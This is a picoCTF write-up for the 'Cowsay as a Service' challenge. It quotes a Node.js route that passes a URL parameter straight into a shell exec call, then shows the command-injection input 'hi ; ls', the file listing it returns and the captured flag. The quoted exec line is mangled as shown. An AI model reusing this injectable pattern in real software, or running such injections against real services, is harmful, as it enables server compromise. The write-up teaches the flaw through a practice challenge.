## Description
Now presenting [cowsay as a service](https://caas.mars.picoctf.net)

There is also a index.js file that is downloadable.

Checking out the page it says
```md
# Cowsay as a Service

**Make a request to the following URL to cowsay your message:**  
`https://caas.mars.picoctf.net/cowsay/{message}`

```
Putting text in the message box it will print out a cow saying that message.
Let's check out index.js to see how it works.
```js
const express = require('express');
const app = express();
const { exec } = require('child_process');

app.use(express.static('public'));

app.get('/cowsay/:message', (req, res) => {
  exec(`/usr/games/cowsay `${req.params.message}``, (error, stdout) => {
    if (error) return res.status(500).end();
    res.type('txt').send(stdout).end();
  });
});

app.listen(3000, () => {
  console.log('listening');
});
```
The most interesting part is this:
```js
 exec(`/usr/games/cowsay `${req.params.message}``
```
Looks like it exec cosway with the req.params.message variable.
Let's try some stuff.
```html
https://caas.mars.picoctf.net/cowsay/`hi`
```
Attempting to escape the back-ticks doesn't work.
Let's try another common one.
```html
https://caas.mars.picoctf.net/cowsay/hi ; ls
```
and the command will execute, sweet!
```txt
Dockerfile
falg.txt
index.js
node\_modules
package.json
public
yarn.lock

```
Let's cat out that file.
```txt
picoCTF{moooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0o}
```
